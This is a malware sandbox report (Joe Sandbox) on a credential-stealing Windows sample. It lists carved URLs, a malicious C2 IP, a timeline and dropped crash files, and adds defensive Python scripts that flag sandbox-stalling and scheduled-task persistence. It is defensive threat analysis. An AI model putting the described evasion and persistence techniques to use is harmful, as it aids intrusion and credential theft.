https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68 | bhvD3AB.tmp.16.dr | false | Avira URL Cloud: safe | unknown
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2 | bhvD3AB.tmp.16.dr | false | | high
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d | bhvD3AB.tmp.16.dr | false | Avira URL Cloud: safe | unknown
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437 | bhvD3AB.tmp.16.dr | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=wsb | bhvD3AB.tmp.16.dr | false | | high
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326 | bhvD3AB.tmp.16.dr | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03 | bhvD3AB.tmp.16.dr | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/frere-user.html | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aefd.nelreports.net/api/report?cat=bingaot | bhvD3AB.tmp.16.dr | false | | high
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae | bhvD3AB.tmp.16.dr | false | | high
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7 | bhvD3AB.tmp.16.dr | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers8 | LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD | bhvD3AB.tmp.16.dr | false | | high
https://aefd.nelreports.net/api/report?cat=bingrms | bhvD3AB.tmp.16.dr | false | | high
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993 | bhvD3AB.tmp.16.dr | false | | high
https://www.google.com/accounts/servicelogin | DGlxtFUfY.exe | false | | high
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5 | bhvD3AB.tmp.16.dr | false | Avira URL Cloud: safe | unknown
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3 | bhvD3AB.tmp.16.dr | false | | high
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135 | bhvD3AB.tmp.16.dr | false | | high
http://geoplugin.net/json.gpaf | DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59 | bhvD3AB.tmp.16.dr | false | | high

These are strings carved from memory dumps and dropped files, not observed connections: the only network traffic the report records is to geoplugin.net and 192.3.64.152 (see the contacted domains and IPs). Trailing characters such as "G", "bThe", "DPlease" or "(;" are adjacent bytes from the dump, not part of the URL, and the Microsoft, Office and LinkedIn telemetry endpoints sourced from bhvD3AB.tmp.16.dr are residue of the browser artefacts the sample touched rather than attacker infrastructure. The nirsoft.net, login.yahoo.com and google.com/accounts/servicelogin strings in DGlxtFUfY.exe line up with the credential-theft signatures listed for that process.
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
192.3.64.152 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                              Analysis ID:1569374
                                                                                                                                              Start date and time:2024-12-05 18:24:13 +01:00
                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 8m 33s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:25
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: LdSbZG1iH6.exe (renamed because the original name is a hash value)
Original Sample Name: 04e6dda7961928fadeecd13e02b9195d31a5e3a9925d4de51072089bc7a1b452.exe
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winEXE@29/27@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 196
• Number of non-executed functions: 303
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173, 52.182.143.212
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big: too many NtAllocateVirtualMemory calls found.
• Report size getting too big: too many NtCreateKey calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• VT rate limit hit for: LdSbZG1iH6.exe
Time | Type | Description
12:25:30 | API Interceptor | 3x Sleep call for process: LdSbZG1iH6.exe modified
12:25:32 | API Interceptor | 42x Sleep call for process: powershell.exe modified
12:25:36 | API Interceptor | 399887x Sleep call for process: DGlxtFUfY.exe modified
12:26:30 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
17:25:34 | Task Scheduler | Run new task: DGlxtFUfY path: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
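Two things in the timeline above deserve a mechanical check rather than a glance: the dropped DGlxtFUfY.exe issued 399887 Sleep calls that the sandbox had to patch (a process stalling to outlast the analysis window, which fits the "Timeout" stop reason), and the new scheduled task points at a binary under C:\Users\user\AppData\Roaming, a path any standard user can write to. Note also that the Task Scheduler row is five hours ahead of the API Interceptor rows; the minidump below records an "Eastern Standard Time" zone, so the 17:25:34 value is consistent with the same moment expressed in UTC, falling between the 12:25:32 and 12:25:36 rows in local time. The following triage script is an added example, not part of the report or of Joe Sandbox; its input rows are constructed from the timeline above, and the stall threshold and the list of user-writable roots are assumptions to be tuned per environment.

```python
"""Triage of Joe Sandbox timeline rows (API Interceptor / Task Scheduler).

Added example, not the sandbox's own code. TIMELINE is constructed from the
rows shown in the report; SLEEP_STALL_THRESHOLD and USER_WRITABLE_ROOTS are
assumptions for this example.
"""
import re
from dataclasses import dataclass

# Constructed from the report's timeline rows: "Time | Type | Description".
TIMELINE = [
    "12:25:30 | API Interceptor | 3x Sleep call for process: LdSbZG1iH6.exe modified",
    "12:25:32 | API Interceptor | 42x Sleep call for process: powershell.exe modified",
    "12:25:36 | API Interceptor | 399887x Sleep call for process: DGlxtFUfY.exe modified",
    "12:26:30 | API Interceptor | 2x Sleep call for process: WerFault.exe modified",
    r"17:25:34 | Task Scheduler | Run new task: DGlxtFUfY path: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe",
]

SLEEP_RE = re.compile(r"^(\d+)x Sleep call for process: (\S+) modified$")
TASK_RE = re.compile(r"^Run new task: (\S+) path: (.+)$")

# Directories a standard user can write to (assumed list). A scheduled task
# whose action lives here was not installed by an administrator or installer.
USER_WRITABLE_ROOTS = (
    "\\appdata\\roaming\\",
    "\\appdata\\local\\",
    "\\users\\public\\",
    "\\programdata\\",
)

# The sandbox patches Sleep so delays pass instantly; a process that then makes
# hundreds of thousands of Sleep calls is looping to wait out the analysis
# window. Threshold is an assumption; tune it per environment.
SLEEP_STALL_THRESHOLD = 10_000


@dataclass(frozen=True)
class Finding:
    subject: str   # process name or task name
    reason: str


def parse_row(line: str) -> tuple[str, str, str]:
    """Split 'Time | Type | Description' into its three fields."""
    time, kind, desc = (part.strip() for part in line.split("|", 2))
    return time, kind, desc


def is_user_writable(path: str) -> bool:
    lowered = path.lower()
    return any(root in lowered for root in USER_WRITABLE_ROOTS)


def sleep_counts(rows) -> dict[str, int]:
    """Total patched-Sleep calls per process name."""
    counts: dict[str, int] = {}
    for line in rows:
        _, kind, desc = parse_row(line)
        if kind != "API Interceptor":
            continue
        m = SLEEP_RE.match(desc)
        if m:
            counts[m.group(2)] = counts.get(m.group(2), 0) + int(m.group(1))
    return counts


def triage(rows) -> list[Finding]:
    """Flag sandbox stalling and persistence from user-writable locations."""
    findings = []
    for proc, n in sleep_counts(rows).items():
        if n >= SLEEP_STALL_THRESHOLD:
            findings.append(Finding(proc, f"{n} patched Sleep calls: likely sandbox stalling"))
    for line in rows:
        _, kind, desc = parse_row(line)
        if kind != "Task Scheduler":
            continue
        m = TASK_RE.match(desc)
        if m and is_user_writable(m.group(2)):
            findings.append(Finding(m.group(1), f"scheduled task runs from user-writable path {m.group(2)}"))
    return findings


if __name__ == "__main__":
    for f in triage(TIMELINE):
        print(f"[!] {f.subject}: {f.reason}")
```

On a live host the same two checks map to `Get-ScheduledTask | Select -ExpandProperty Actions` for the task path and to the process's thread count and Sleep frequency for the stall; the script only shows the logic against the report's rows.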
Match | Associated Sample Name / URL | Detection | Threat Name | Context
178.237.33.50 | tXcFA8apHU.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | f5TWdT5EAc.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig | www.geoplugin.net/json.gp?ip=
178.237.33.50 | 17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | togiveme.doc | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | greatnew.doc | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1733313724403c020f6e88b0c933bdcc8580dbdc997912d71ff6e423ca5d8288c03cec53d3177.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | cUxXrdUvYR.rtf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Amoxycillin Trihydrate Powder.docx.doc | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Order_DEC2024.wsf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx | malicious | Remcos | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
geoplugin.net | tXcFA8apHU.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | togiveme.doc | malicious | Remcos | 178.237.33.50
geoplugin.net | greatnew.doc | malicious | Remcos | 178.237.33.50
geoplugin.net | 1733313724403c020f6e88b0c933bdcc8580dbdc997912d71ff6e423ca5d8288c03cec53d3177.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | cUxXrdUvYR.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | Amoxycillin Trihydrate Powder.docx.doc | malicious | Remcos | 178.237.33.50
geoplugin.net | Order_DEC2024.wsf | malicious | Remcos | 178.237.33.50
geoplugin.net | #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 172.245.123.3
AS-COLOCROSSINGUS | Document.xla.xlsx | malicious | FormBook, HTMLPhisher | 107.172.44.175
AS-COLOCROSSINGUS | bestimylover.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 107.172.44.175
AS-COLOCROSSINGUS | nicpeoplesideasgivenforme.hta | malicious | Cobalt Strike, HTMLPhisher | 198.46.178.192
AS-COLOCROSSINGUS | dgreatth.doc | malicious | Unknown | 192.3.95.197
AS-COLOCROSSINGUS | MdDRzxozMD.xlsx | malicious | Unknown | 104.168.7.19
AS-COLOCROSSINGUS | fUHl7rElXU.xlsx | malicious | Unknown | 104.168.7.19
AS-COLOCROSSINGUS | boatnet.mpsl.elf | malicious | Mirai | 198.23.133.131
AS-COLOCROSSINGUS | boatnet.mips.elf | malicious | Mirai | 198.23.133.131
AS-COLOCROSSINGUS | boatnet.sh4.elf | malicious | Mirai | 198.23.133.131
ATOM86-ASATOM86NL | tXcFA8apHU.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | f5TWdT5EAc.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig | 178.237.33.50
ATOM86-ASATOM86NL | 17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | togiveme.doc | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | greatnew.doc | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 1733313724403c020f6e88b0c933bdcc8580dbdc997912d71ff6e423ca5d8288c03cec53d3177.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | cUxXrdUvYR.rtf | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Amoxycillin Trihydrate Powder.docx.doc | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Order_DEC2024.wsf | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx | malicious | Remcos | 178.237.33.50
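The three context tables above are easy to over-read. The domain table shows geoplugin.net only next to Remcos samples, which looks like a family-specific pivot; the IP table for the same host, 178.237.33.50, also lists a Phorpiex/RHADAMANTHYS/Xmrig sample, and the context cell "geoplugin.net/json.gp" is a public geolocation endpoint that several families query after infection. The ASN rows say even less: AS-COLOCROSSINGUS hosts unrelated Cobalt Strike, FormBook, HTMLPhisher and Mirai samples. The script below is an added example, not code from the report or from Joe Sandbox; it rebuilds a subset of the rows above, joins each indicator to the families seen on its context value, and labels indicators by how family-specific they turn out to be. The sample thresholds are assumptions.

```python
"""Pivot assessment over the sandbox 'context' tables (IP, domain, ASN).

Added example, not the report's or Joe Sandbox's code. CONTEXT_ROWS is a
constructed subset of the rows shown above; MIN_SAMPLES and
MAX_FAMILIES_FOR_PIVOT are assumptions for this example.
"""
from dataclasses import dataclass, field

# (indicator, indicator type, related sample name, threat names, context value)
CONTEXT_ROWS = [
    ("178.237.33.50", "ip", "tXcFA8apHU.exe", ("Remcos",), "geoplugin.net/json.gp"),
    ("178.237.33.50", "ip", "f5TWdT5EAc.exe", ("Phorpiex", "RHADAMANTHYS", "Xmrig"), "www.geoplugin.net/json.gp?ip="),
    ("178.237.33.50", "ip", "togiveme.doc", ("Remcos",), "geoplugin.net/json.gp"),
    ("178.237.33.50", "ip", "greatnew.doc", ("Remcos",), "geoplugin.net/json.gp"),
    ("178.237.33.50", "ip", "cUxXrdUvYR.rtf", ("Remcos",), "geoplugin.net/json.gp"),
    ("178.237.33.50", "ip", "Order_DEC2024.wsf", ("Remcos",), "geoplugin.net/json.gp"),
    ("geoplugin.net", "domain", "tXcFA8apHU.exe", ("Remcos",), "178.237.33.50"),
    ("geoplugin.net", "domain", "togiveme.doc", ("Remcos",), "178.237.33.50"),
    ("geoplugin.net", "domain", "greatnew.doc", ("Remcos",), "178.237.33.50"),
    ("geoplugin.net", "domain", "Order_DEC2024.wsf", ("Remcos",), "178.237.33.50"),
    ("AS-COLOCROSSINGUS", "asn", "bestimylover.hta", ("Cobalt Strike", "FormBook", "HTMLPhisher"), "107.172.44.175"),
    ("AS-COLOCROSSINGUS", "asn", "dgreatth.doc", ("Unknown",), "192.3.95.197"),
    ("AS-COLOCROSSINGUS", "asn", "boatnet.mips.elf", ("Mirai",), "198.23.133.131"),
    ("ATOM86-ASATOM86NL", "asn", "tXcFA8apHU.exe", ("Remcos",), "178.237.33.50"),
    ("ATOM86-ASATOM86NL", "asn", "togiveme.doc", ("Remcos",), "178.237.33.50"),
]

MIN_SAMPLES = 3              # assumption: fewer than this is not enough to judge
MAX_FAMILIES_FOR_PIVOT = 1   # assumption: more than one family means shared infra


@dataclass
class IndicatorSummary:
    kind: str
    samples: set = field(default_factory=set)
    families: set = field(default_factory=set)
    contexts: set = field(default_factory=set)


def summarize(rows) -> dict:
    """Collapse rows into one summary per indicator."""
    out: dict[str, IndicatorSummary] = {}
    for indicator, kind, sample, families, context in rows:
        s = out.setdefault(indicator, IndicatorSummary(kind))
        s.samples.add(sample)
        s.families.update(families)
        s.contexts.add(context)
    return out


def join_on_context(summary: dict) -> dict:
    """Return indicator -> families, folding in families seen on its context value.

    The domain table alone shows geoplugin.net with Remcos only; its context is
    178.237.33.50, which the IP table ties to four families. Without this join
    the domain would look like a clean family-specific pivot.
    """
    base = {name: set(s.families) for name, s in summary.items()}
    joined = {}
    for name, s in summary.items():
        fams = set(base[name])
        for ctx in s.contexts:
            host = ctx.split("/", 1)[0]          # drop path/query from "host/json.gp?ip="
            if host.startswith("www."):
                host = host[4:]
            if host in base and host != name:
                fams |= base[host]
        joined[name] = fams
    return joined


def assess(summary: dict) -> dict:
    """Label each indicator by how family-specific it is after the join."""
    families = join_on_context(summary)
    verdict = {}
    for name, s in summary.items():
        fams = families[name]
        if s.kind == "asn":
            verdict[name] = "hosting-provider match: not an indicator by itself"
        elif len(fams) > MAX_FAMILIES_FOR_PIVOT:
            verdict[name] = f"shared by {len(fams)} families: shared service or hosting, not a family-specific C2"
        elif len(s.samples) >= MIN_SAMPLES:
            verdict[name] = f"single family across {len(s.samples)} samples: pivot candidate"
        else:
            verdict[name] = "too few samples to judge"
    return verdict


if __name__ == "__main__":
    for name, v in assess(summarize(CONTEXT_ROWS)).items():
        print(f"{name}: {v}")
```

The practical consequence: block or alert on the C2 endpoints the configuration extractor recovered, and treat geoplugin.net traffic from an unexpected process as a behavioural signal to correlate with, not as an indicator to block on its own.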
No context
No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.009719518921121
Encrypted: false
SSDEEP: 192:WR9xvk9qI0BU/wjkZraHt2zuiFyZ24IO8k:M9xvk9qjBU/wjizuiFyY4IO8k
MD5: E5BBD4409FDCC18D61E7DAFABD04FD16
SHA1: 7B7813D501264E495C136FADAE43D5E746A93C61
SHA-256: 89FDE3CD041C6B724A7709962C4E75A55CA186C547D8FD3FAE0D6810087EEC57
SHA-512: F4AF58F3D4AD141B762969D0A694F0EC0BF684AA8777EA4C4E4E209B1FE8793C6485542CA0F26C37CAB87FC9EAABF6FBBBC76E313952C5C63B68A152829B84F1
Malicious: false
Preview (UTF-16 decoded, truncated as in the report):
  Version=1
  EventType=APPCRASH
  EventTime=133778932220524607
  ReportType=2
  Consent=1
  UploadTime=133778932227399536
  ReportStatus=524384
  ReportIdentifier=af3969b5-4bbf-425c-a680-1a8dd4a5027f
  IntegratorReportIdentifier=6667de38-a9ec-4504-a9c4-f299b815d08f
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=DGlxtFUfY.exe
  OriginalFilename=ZPyJ.exe
  AppSessionGuid=00001f88-0001-0014-fc53-2cb33a47db01
  TargetAppId=W:00065ea2bffdf2d056d8654d6b1c0573fbdd00000000!0000a56c4724edef9a8fef490520ecaeb30c8356e314
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.5831712158236109
Encrypted: false
SSDEEP: 96:1P+FZaGRasQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTA0f/VXT5Nm:1GzlRak0WbkQzuiFyZ24IO8b
MD5: D1C2AF97D35EF050EB52983B3CC637A6
SHA1: F2746F8BAC1FF7F75E0DD7720EFBE6BBA0BEDB36
SHA-256: EFA9605758CA45BA931673AF1E18BED958DA11FC27CF8DFF0F363CF26F97C529
SHA-512: 45851EE1D754ECCE71AD974270C8DE4E1F0A9035DCE8101C9321A6BFECFC3E16C655AE7360DCE888C86D2E0D5AC606D7FFF683B2A406DCA2BA7A531B2F043700
Malicious: false
Preview (UTF-16 decoded, truncated as in the report):
  Version=1
  EventType=APPCRASH
  EventTime=133778931622765996
  ReportType=2
  Consent=1
  UploadTime=133778931667140903
  ReportStatus=524384
  ReportIdentifier=9bd6f1a5-e3da-4944-9387-445933437085
  IntegratorReportIdentifier=c599d5f2-8b9d-4247-8858-31d93c3ea7de
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=bad_module_info
  AppSessionGuid=00001b24-0001-0014-cd39-6fc13a47db01
  TargetAppId=W:00065ea2bffdf2d056d8654d6b1c0573fbdd00000000!0000a56c4724edef9a8fef490520ecaeb30c8356e314!DGlxtFUfY.exe
  TargetApp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Thu Dec 5 17:27:02 2024, 0x1205a4 type
Category: dropped
Size (bytes): 152738
Entropy (8bit): 1.7748812931649318
Encrypted: false
SSDEEP: 768:b5sWe57eqRCinPG9DDe0Sl+Uf7GjIjfHcE:bWReW/nPqFSl+Uf7GjIjfcE
MD5: 17C7ACF8C7FFCB48F57D034733860C1E
SHA1: 2826A17036EEB0636F9147193AA45CA23402A165
SHA-256: AE2772C97875F6E7753068093D9108C90DBFE02AB6B9F3DC6B0D921ABC8619D4
SHA-512: BC4968C4D49E722675FE18A692EA4304B6F053E73D6724F3E00F9A70C120F74483B5D6782D34FC398FA052840B49747B2A90CE2409CA17CE71176C6565D973C1
Malicious: false
Preview: MDMP..a..... .......f.Qg........................|...........$...<[..........T.......8...........T............=..............."..........t$..............................................................................eJ.......%......GenuineIntel............T.............Qg............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6 (readable strings in the header: GenuineIntel, Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406)
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):6316
Entropy (8bit):3.7286847528759903
Encrypted:false
SSDEEP:96:RSIU6o7wVetbLeA6mwNeYTQE/JZz5aM4Ui89bPvZtsf079vZm:R6l7wVeJLx6KYTZpri89bnZtsf07tZm
MD5:6F03A73EB97CD1217181D740813F7AB4
SHA1:DDFF2D73FA1202306FD0F2B8A63172228DA99A73
SHA-256:5EA81AD82E66B205DB358156916313416FE8CD230D6E23FE42E25C632687E22C
SHA-512:800A0016B3F1D90EE799D8EC4DEBF90BB3C6A576CFBC808DC66C35F41922CDDB4BEE085AE4BF738B597A8A6A8B554670EFC8A4EECD34B148DE378BD3917FA00D
Malicious:false
Preview:..<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>8072</Pi
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4631
Entropy (8bit):4.484518422524437
Encrypted:false
SSDEEP:48:cvIwWl8zsZaJg77aI91OjrWpW8VYBDYm8M4JBsp5F8p/+q8jcFu6Sb30+yd:uIjfiI73D7VOWJB926q0+yd
MD5:0D7BDD3B293523E4DAE4B2D01452CAD6
SHA1:6876913E8C8BC1D0D5E0B6C91A23ACA802D0F4A7
SHA-256:8D42407E36667CD3446E360CF1CD3AB11518E943B5DD4A77009A7CE1808DD300
SHA-512:F27169EF6A8453F63DFDC6FDCBC84576B592F4A8506B6AC118165C84C0210CDC1FC72679261E81796D310DDD5F22E37ADC0B6DAB7300B63C934A852ADF6544C4
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618269" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8262
Entropy (8bit):3.6833918989312133
Encrypted:false
SSDEEP:192:R6l7wVeJd96V6YLs634gmfU7pxr89bMXsfrkm:R6lXJX6V6Yw634gmfUYMcft
MD5:7373759B68DBB409A247AA5BBED9EABE
SHA1:800BD57A52BC13F395DCCBCE5FE21D11072BA7CA
SHA-256:1D86347B18092039F82CFFC789C9BBC737FAFC35467B0042CA87F4BD901FBAC6
SHA-512:9DA1D391C868D148C1EDA5FB970880611399DE1F3374808712D88F102688C34187709DB9F63F9609A919843B464ED93E4ABC2673D38290967E42353739569216
Malicious:false
Preview:..<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>6948</Pi
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4576
Entropy (8bit):4.454611202851358
Encrypted:false
SSDEEP:48:cvIwWl8zsZxJg77aI91OjrWpW8VY6Ym8M4JTHFh5P+q8795Sb33iWd:uIjftI73D7VqJLFY5q3iWd
MD5:04BD279EF7101807C8AC3A024A8B2BD2
SHA1:5FEC8B03277AB8C40DEED1ED6706A736296A23EE
SHA-256:55E5812D43CF3880CB25E405BF1DE4C45BE22CE108A986E0F006BA6458238EFD
SHA-512:FD4AFEE9384ACD1DBEB13CAD06D9D47763416EAEC5262D77A2D851E3B1944BEDB56F48E28A6F24FBF9AA8EBA715FCDA73893D5A3D6BF3629BFE994964427299F
Malicious:false
